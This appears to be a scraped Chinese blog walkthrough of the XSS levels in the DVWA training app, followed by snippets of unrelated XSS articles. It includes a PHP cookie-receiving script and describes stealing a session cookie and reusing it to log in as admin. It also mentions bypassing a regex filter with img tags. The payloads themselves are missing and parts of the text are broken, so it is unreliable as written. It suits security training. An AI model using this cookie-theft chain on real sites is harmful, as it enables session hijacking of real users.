DVWA XSS(跨站指令碼攻擊)

2022-08-20 21:39:15 字數 1920 閱讀 7954

xss攻擊全稱跨站指令碼攻擊,xss是一種經常出現在web應用中的計算機安全漏洞,它允許惡意web使用者將**植入到提供給其它使用者使用的頁面中。比如這些**包括html**和客戶端指令碼。

儲存型xss:將使用者輸入的資料儲存在伺服器端。

dom xss:通過修改頁面的dom節點形成的xss。(可能是儲存型也可能使反射型)

<?php 

//is there any input?

if( array_key_exists( "

name

", $_get ) && $_get[ '

name

' ] !=null )

?>

我們可以看到,**直接引用了name引數,並沒有任何的過濾與檢查,存在明顯的

xss漏洞。

所以我們構造payload語句:,可以看到直接就執行了我們的js**。

在www目錄下建立乙個cookie.php檔案,內容如下:

<?php

$cookie=$_get['cookie'];//將get請求引數儲存到cookie變數中

file_put_contents('cookie.txt',$cookie);//把偷取的使用者cookie寫到cookie.txt檔案中

?>

編寫js**將頁面的cookie傳送到cookie.php中:#

構造並傳送攻擊url:

後面的引數要進行url編碼,

頁面發生跳轉後,我們發現在www目錄下多了個 cookie檔案,開啟發現成功拿到了cookie。。

接下來我們可以利用得到的cookie登入dvwa的首頁:

f12調出cookie右鍵點選編輯把phpsessen換成我們獲取的。然後訪問dvwa的index.php,就可以直接以管理員的身份進去了

這一關我們可以看到雙寫繞過、大小寫混淆繞過

不再有效。

雖然無法使用

可以看到,這裡使用正規表示式過濾了標籤,但是卻忽略了img、iframe等其它危險的標籤,因此name引數依舊存在儲存型xss。

我們這裡可以抓包改name引數為

跨站指令碼攻擊

跨站指令碼攻擊是眾所周知的攻擊方式之一。所有平台上的web應用都深受其擾,php應用也不例外。所有有輸入的應用都面臨著風險。webmail,code 複製內容到剪貼簿 code 複製php內容到剪貼簿 php echo name writes echo comment 這個流程對 comment及 ...

跨站指令碼攻擊 XSS

跨站指令碼攻擊,cross site script,為了區別css,英文縮寫為xss xss攻擊,通常指hacker通過 html注入 篡改了網頁,插入惡意的指令碼,從而在使用者瀏覽網頁時,控制使用者瀏覽器的一種攻擊。xss根據效果的不同可以分為如下幾類 1.反射型xss 通過將使用者輸入的資料 反...

Xss跨站指令碼攻擊

1.內容 攻擊者在web網頁中插入惡意js 當使用者瀏覽該瀏覽器頁面的時候,嵌入web中的js 會被執行,從而受到惡意攻擊,這就是跨站指令碼攻擊。xss指令碼植入方式前台接收資料存入資料庫,在渲染頁面時從資料庫中讀取相應資訊 2 分類 1 反射性的xss 發出請求時,xss 出現在url中,作為輸入...